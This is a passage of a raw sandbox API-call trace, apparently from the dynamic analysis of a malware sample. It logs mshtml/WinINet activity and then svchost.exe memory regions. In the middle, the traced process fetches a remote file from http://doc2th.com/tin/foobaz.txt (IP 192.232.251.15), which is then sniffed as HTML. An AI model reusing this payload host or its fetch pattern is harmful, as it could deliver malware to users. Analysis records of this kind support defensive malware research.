IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x14fb64 | out: ppvObject=0x14fb64*=0x0) returned 0x80004002 [0047.372] IServiceProvider:QueryService 
(in: This=0x121770, guidService=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14fb60 | out: ppvObject=0x14fb60*=0x636896bc) returned 0x0 [0047.372] IUnknown:Release (This=0x121770) returned 0x0 [0047.372] IUnknown:AddRef (This=0x11ab04) returned 0x3 [0047.372] IInternetSecurityManager:MapUrlToZone (in: This=0x636896bc, pwszUrl="about:blank", pdwZone=0x40f56c, dwFlags=0x0 | out: pdwZone=0x40f56c*=0xffffffff) returned 0x800c0011 [0047.372] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0047.372] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0047.372] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0047.372] IInternetSecurityManager:ProcessUrlAction (in: This=0x636896bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x40f570, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x40f570*=0x0) returned 0x0 [0047.372] IUnknown:Release (This=0x11ab04) returned 0x2 [0047.372] IUnknown:Release (This=0xff600) returned 0x1 [0047.372] IUnknown:Release (This=0x11ab04) returned 0x1 [0047.373] LsDestroyContext () returned 0x0 [0047.374] IUnknown:Release (This=0x14fb40) returned 0x0 [0047.374] IUnknown:Release (This=0x12176c) returned 0x0 [0047.374] IUnknown:Release (This=0x636896bc) returned 0x7fff [0047.374] IUnknown:Release (This=0x121f20) returned 0x0 [0047.374] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x75580000 [0047.374] GetProcAddress (hModule=0x75580000, lpProcName=0xc9) returned 0x75584af8 [0047.374] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0047.374] IInternetSession:UnregisterNameSpace (This=0x124868, pCF=0x63688c50, pszProtocol="res") returned 0x0 [0047.374] IUnknown:Release 
(This=0x63688c50) returned 0x1 [0047.375] IInternetSession:UnregisterNameSpace (This=0x124868, pCF=0x63688c70, pszProtocol="about") returned 0x0 [0047.375] IUnknown:Release (This=0x63688c70) returned 0x1 [0047.375] IUnknown:Release (This=0x124868) returned 0x1 [0047.375] IUnknown:Release (This=0x1234e8) returned 0x0 [0047.375] DeleteDC (hdc=0x210107a8) returned 1 [0047.375] DestroyWindow (hWnd=0x10202) returned 1 [0047.375] DefWindowProcW (hWnd=0x10202, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0047.376] DefWindowProcW (hWnd=0x10202, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0047.376] DefWindowProcW (hWnd=0x10202, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0047.377] GetExitCodeThread (in: hThread=0x3b8, lpExitCode=0x40f894 | out: lpExitCode=0x40f894) returned 1 [0047.377] CloseHandle (hObject=0x1bc) returned 1 [0047.377] CloseHandle (hObject=0x3b8) returned 1 [0047.377] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x150ec8) returned 0x0 [0047.377] ReleaseActCtx (in: hActCtx=0x11fa2c | out: hActCtx=0x11fa2c) [0047.377] FreeLibrary (hLibModule=0x6d270000) returned 1 [0047.377] FreeLibrary (hLibModule=0x6d270000) returned 1 [0047.377] UnregisterClassW (lpClassName=0xc19d, hInstance=0x63150000) returned 1 [0047.377] UnregisterClassW (lpClassName=0xc19b, hInstance=0x63150000) returned 1 [0047.377] OleUninitialize () [0047.378] DestroyWindow (hWnd=0x101fc) returned 1 [0047.378] DefWindowProcW (hWnd=0x101fc, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0047.378] PostQuitMessage (nExitCode=0) [0047.378] DllCanUnloadNow () returned 0x0 [0047.378] DllCanUnloadNow () returned 0x1 [0047.378] DllCanUnloadNow () returned 0x1 [0047.408] DefWindowProcW (hWnd=0x101fc, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0047.408] FreeLibrary (hLibModule=0x63150000) returned 1 [0047.408] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x0 [0047.408] ExitProcess (uExitCode=0x0) [0047.416] GetCurrentThreadId () returned 0xa1c [0047.416] DeleteObject 
(ho=0x140a027b) returned 1 [0047.416] DeleteObject (ho=0x120807e9) returned 1 Thread: id = 19 os_tid = 0xa20 Thread: id = 20 os_tid = 0xa24 [0027.161] GetCurrentThreadId () returned 0xa24 Thread: id = 21 os_tid = 0xa28 [0027.200] GetCurrentThreadId () returned 0xa28 Thread: id = 22 os_tid = 0xa2c [0027.202] GetCurrentThreadId () returned 0xa2c [0027.382] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0x20, szStatusText=0x0) returned 0x0 [0045.074] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0x1, szStatusText="doc2th.com") returned 0x0 [0045.074] GetCurrentThreadId () returned 0xa2c [0045.075] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0046.109] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0x2, szStatusText="192.232.251.15") returned 0x0 [0046.109] GetCurrentThreadId () returned 0xa2c [0046.304] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0xb, szStatusText=0x0) returned 0x0 [0046.551] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0x1f, szStatusText="text/plain") returned 0x0 [0046.551] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc19f [0046.551] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc1a0 [0046.551] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc1a1 [0046.551] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc1a2 [0046.551] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc1a3 [0046.551] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc1a4 [0046.551] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc1a5 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc1a6 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc1a7 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc1a8 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc1a9 
[0046.552] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc1aa [0046.552] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc1ab [0046.552] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc1ac [0046.552] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc1ad [0046.552] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc1ae [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc1af [0046.552] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc1b0 [0046.552] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc1b1 [0046.552] StrCmpNICW (lpStr1="text/pla", lpStr2="text/css", nChar=8) returned 13 [0046.552] IInternetProtocolSink:ReportProgress (This=0x14b284, ulStatusCode=0xe, szStatusText="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\B9MX3V6B\\foobaz[1].txt") returned 0x0 [0046.552] GetCurrentProcessId () returned 0xa18 [0046.552] IInternetProtocolSink:ReportData (This=0x14b284, grfBSCF=0x11, ulProgress=0x1, ulProgressMax=0x0) returned 0x0 [0046.552] IUnknown:QueryInterface (in: This=0x14b3e8, riid=0x632c9460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1dce0e8 | out: ppvObject=0x1dce0e8*=0x14b3ec) returned 0x0 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0x1, pBuffer=0x1dcf0c0*=0x0, pcbBuf=0x1dce0f0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcf0c0*=0x74, pcbBuf=0x1dce0f0*=0xa, pdwFlags=0x0, pdwReserved=0x0) returned 0x0 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcebc0*=0x78, pcbBuf=0x1dce0f0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcebc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, 
dwOption=0x2e, pBuffer=0x1dcf3c0*=0x0, pcbBuf=0x1dce0d0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcf3c0*=0x76, pcbBuf=0x1dce0d0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0x4000000b, pBuffer=0x1dce0b4*=0x0, pcbBuf=0x1dce0f0*=0x10, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dce0b4*=0xe1, pcbBuf=0x1dce0f0*=0x10, pdwFlags=0x0, pdwReserved=0x0) returned 0x0 [0046.552] SystemTimeToFileTime (in: lpSystemTime=0x1dce0b4, lpFileTime=0x14b314 | out: lpFileTime=0x14b314) returned 1 [0046.552] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcecc0*=0x58, pcbBuf=0x1dce0f0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcecc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcecc0*=0x44, pcbBuf=0x1dce0f0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcecc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcecc0*=0x43, pcbBuf=0x1dce0f0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcecc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0xffff, pBuffer=0x1dcecc0*=0x58, pcbBuf=0x1dce0f0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcecc0*=0x76, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0x20000013, pBuffer=0x14b2f0*=0x0, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x14b2f0*=0xc8, pcbBuf=0x1dce0f0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x0 [0046.553] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x14b3ec, dwOption=0x12, pBuffer=0x1dcf4c0*=0x0, 
pcbBuf=0x1dce0c8*=0xf, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x1dcf4c0*=0x48, pcbBuf=0x1dce0c8*=0x8, pdwFlags=0x0, pdwReserved=0x0) returned 0x0 [0046.553] StrCmpICA (pszStr1="HTTP/1.0", pszStr2="HTTP/1.1") returned -1 [0046.553] IWinInetInfo:RemoteQueryOption (in: This=0x14b3ec, dwOption=0x17, pBuffer=0x1dce0d8*=0x0, pcbBuf=0x1dce0f0*=0x4 | out: pBuffer=0x1dce0d8*=0x0, pcbBuf=0x1dce0f0*=0x4) returned 0x0 [0046.553] IWinInetInfo:RemoteQueryOption (in: This=0x14b3ec, dwOption=0x1f, pBuffer=0x1dce0d8*=0x0, pcbBuf=0x1dce0f0*=0x4 | out: pBuffer=0x1dce0d8*=0x0, pcbBuf=0x1dce0f0*=0x4) returned 0x0 [0046.561] IWinInetInfo:RemoteQueryOption (in: This=0x14b3ec, dwOption=0x42, pBuffer=0x1dce0f4*=0xcc, pcbBuf=0x1dce0ec*=0x2cc | out: pBuffer=0x1dce0f4*=0xcc, pcbBuf=0x1dce0ec*=0x2cc) returned 0x0 [0046.561] IWinInetInfo:RemoteQueryOption (in: This=0x14b3ec, dwOption=0xfffe, pBuffer=0x14b334*=0x0, pcbBuf=0x1dce0f0*=0x4 | out: pBuffer=0x14b334*=0xb0, pcbBuf=0x1dce0f0*=0x4) returned 0x0 [0046.561] IUnknown:Release (This=0x14b3ec) returned 0x5 [0046.561] GetCurrentThreadId () returned 0xa2c [0046.561] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="text/plain", cchCount1=7, lpString2="charset", cchCount2=7) returned 3 [0046.561] GetCurrentThreadId () returned 0xa2c [0046.562] GetCurrentThreadId () returned 0xa2c [0046.562] MulDiv (nNumber=1, nNumerator=4000, nDenominator=1) returned 4000 [0046.562] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0046.562] GetCurrentThreadId () returned 0xa2c [0046.562] IInternetProtocol:Read (in: This=0x14b3e8, pv=0x16c2cc, cb=0x2000, pcbRead=0x1dcf4b4 | out: pv=0x16c2cc, pcbRead=0x1dcf4b4*=0x14f) returned 0x0 [0046.566] IInternetProtocol:Read (in: This=0x14b3e8, pv=0x16c41b, cb=0x1eb1, pcbRead=0x1dcf4b4 | out: pv=0x16c41b, pcbRead=0x1dcf4b4*=0x0) returned 0x1 [0046.579] IInternetProtocolSink:ReportData (This=0x14b284, grfBSCF=0x15, ulProgress=0x14f, ulProgressMax=0x0) returned 0x0 [0046.579] 
IInternetProtocolSink:ReportResult (This=0x14b284, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0046.579] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://doc2th.com/tin/foobaz.txt", pSecMgr=0x0) returned 0x1 [0046.580] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1dcf328 | out: phkResult=0x1dcf328*=0x134) returned 0x0 [0046.580] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1dcf32c | out: phkResult=0x1dcf32c*=0x438) returned 0x0 [0046.580] RegOpenKeyExW (in: hKey=0x438, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x1dcf2e8 | out: phkResult=0x1dcf2e8*=0x0) returned 0x2 [0046.580] RegOpenKeyExW (in: hKey=0x134, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x1dcf2e8 | out: phkResult=0x1dcf2e8*=0x0) returned 0x2 [0046.580] RegCloseKey (hKey=0x0) returned 0x6 [0046.580] RegCloseKey (hKey=0x0) returned 0x6 [0046.580] RegCloseKey (hKey=0x134) returned 0x0 [0046.580] RegCloseKey (hKey=0x438) returned 0x0 [0046.585] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\B9MX3V6B\\foobaz[1].txt", pBuffer=0x1dcf3c8, cbSize=0xc8, pwzMimeProposed="text/plain", dwMimeFlags=0x6, ppwzMimeOut=0x1dcf380, dwReserved=0x0 | out: ppwzMimeOut=0x1dcf380*="text/html") returned 0x0 [0046.586] CoTaskMemFree (pv=0x144db0) [0046.586] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://doc2th.com/tin/foobaz.txt", pSecMgr=0x0) returned 0x1 [0046.586] StrCmpNIW (lpStr1="text/p", lpStr2="image/", nChar=6) returned 1 [0046.586] GetCurrentThreadId () returned 0xa2c [0046.586] SetEvent (hEvent=0x1bc) returned 1 [0046.595] GetCurrentThreadId 
() returned 0xa2c [0046.595] MulDiv (nNumber=334, nNumerator=4000, nDenominator=335) returned 3988 [0046.595] GetCurrentThreadId () returned 0xa2c [0046.595] SetEvent (hEvent=0x1bc) returned 1 [0046.596] GetCurrentThreadId () returned 0xa2c [0046.596] SetEvent (hEvent=0x1bc) returned 1 [0046.596] IUnknown:Release (This=0x14b284) returned 0x3 Thread: id = 23 os_tid = 0xa30 [0027.291] GetCurrentThreadId () returned 0xa30 Thread: id = 24 os_tid = 0xa34 [0027.372] GetCurrentThreadId () returned 0xa34 Thread: id = 25 os_tid = 0xa38 [0027.464] GetCurrentThreadId () returned 0xa38 [0027.464] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x63150000 [0027.465] CoInitialize (pvReserved=0x0) returned 0x0 [0027.465] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0046.586] GetTickCount () returned 0x1a707 [0046.586] IInternetProtocolRoot:Terminate (This=0x14b3e8, dwOptions=0x0) returned 0x0 [0046.586] IUnknown:Release (This=0x14b248) returned 0x7 [0046.586] IUnknown:Release (This=0x14b248) returned 0x6 [0046.587] IUnknown:Release (This=0x14b24c) returned 0x5 [0046.587] IUnknown:Release (This=0x14b244) returned 0x4 [0046.587] IUnknown:Release (This=0x14b284) returned 0x3 [0046.587] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f2e0, cbMultiByte=335, lpWideCharStr=0x1702f4, cchWideChar=335 | out: lpWideCharStr="\r\n") returned 335 [0046.587] IUnknown:AddRef (This=0x11ae64) returned 0x11 [0046.587] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x233f7dc | out: lpCPInfo=0x233f7dc) returned 1 [0046.587] IUnknown:AddRef (This=0x124868) returned 0x4 [0046.587] IUnknown:AddRef (This=0x11ae64) returned 0x12 [0046.587] IUnknown:QueryInterface (in: This=0x11ae64, riid=0x6330d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x233f7e4 | out: ppvObject=0x233f7e4*=0x11ae64) returned 0x0 [0046.587] IUnknown:Release (This=0x11ae64) returned 0x12 
[0046.587] IUnknown:AddRef (This=0x11ae64) returned 0x13 [0046.587] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x233f7e8 | out: pdwScheme=0x233f7e8*=0x2) returned 0x0 [0046.588] IUnknown:Release (This=0x11ae64) returned 0x12 [0046.588] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0046.591] GetTickCount () returned 0x1a717 [0046.592] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0046.595] GetTickCount () returned 0x1a717 [0046.596] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0046.596] GetTickCount () returned 0x1a717 [0046.596] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0047.253] GetTickCount () returned 0x1a85f [0047.254] WaitForSingleObject (hHandle=0x1bc, dwMilliseconds=0x927c0) returned 0x0 [0047.376] CoUninitialize () [0047.376] FreeLibraryAndExitThread (hLibModule=0x63150000, dwExitCode=0x0) [0047.377] GetCurrentThreadId () returned 0xa38 Thread: id = 26 os_tid = 0xa3c [0027.468] GetCurrentThreadId () returned 0xa3c Thread: id = 47 os_tid = 0xa94 [0036.872] GetCurrentThreadId () returned 0xa94 Thread: id = 50 os_tid = 0xb38 [0046.111] GetCurrentThreadId () returned 0xb38 Thread: id = 51 os_tid = 0xb3c [0047.028] GetCurrentThreadId () returned 0xb3c [0047.191] GetCurrentThreadId () returned 0xb3c Thread: id = 52 os_tid = 0xb40 [0047.177] GetCurrentThreadId () returned 0xb40 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f1e6200" os_pid = "0x3f4" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0xa18" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This 
Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c858" [0xc000000f], "LOCAL" [0x7] Region: id = 554 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 555 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 556 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 557 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 558 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 559 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 560 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 561 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 562 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 563 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000130000" filename = "" Region: id = 564 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 565 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x210000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 566 start_va = 0x220000 end_va = 0x223fff entry_point = 0x220000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 567 start_va = 0x230000 end_va = 0x231fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 568 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 569 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 570 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 571 start_va = 0x280000 end_va = 0x2fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 572 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 573 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 574 start_va = 0x550000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 575 start_va = 0x590000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 576 start_va = 
0x5d0000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 577 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 578 start_va = 0x6b0000 end_va = 0x6b7fff entry_point = 0x6b0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 579 start_va = 0x6c0000 end_va = 0xab2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 580 start_va = 0xaf0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 581 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 582 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 583 start_va = 0xbe0000 end_va = 0xeaefff entry_point = 0xbe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 584 start_va = 0xeb0000 end_va = 0xf6ffff entry_point = 0xeb0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 585 start_va = 0xf80000 end_va = 0xfbffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 586 start_va = 0x1050000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 587 start_va = 0x10a0000 end_va = 0x10dffff entry_point = 0x0 region_type = private name = 
"private_0x00000000010a0000" filename = "" Region: id = 588 start_va = 0x10e0000 end_va = 0x111ffff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 589 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 590 start_va = 0x11b0000 end_va = 0x11effff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 591 start_va = 0x1270000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 592 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 593 start_va = 0x12c0000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 594 start_va = 0x13c0000 end_va = 0x14bffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 595 start_va = 0x1570000 end_va = 0x15affff entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 596 start_va = 0x15d0000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 597 start_va = 0x1630000 end_va = 0x166ffff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 598 start_va = 0x16a0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 599 start_va = 0x1730000 end_va = 0x173ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 600 start_va = 0x1790000 end_va = 0x17cffff entry_point = 0x0 region_type = private name = "private_0x0000000001790000" filename = "" Region: id = 601 start_va = 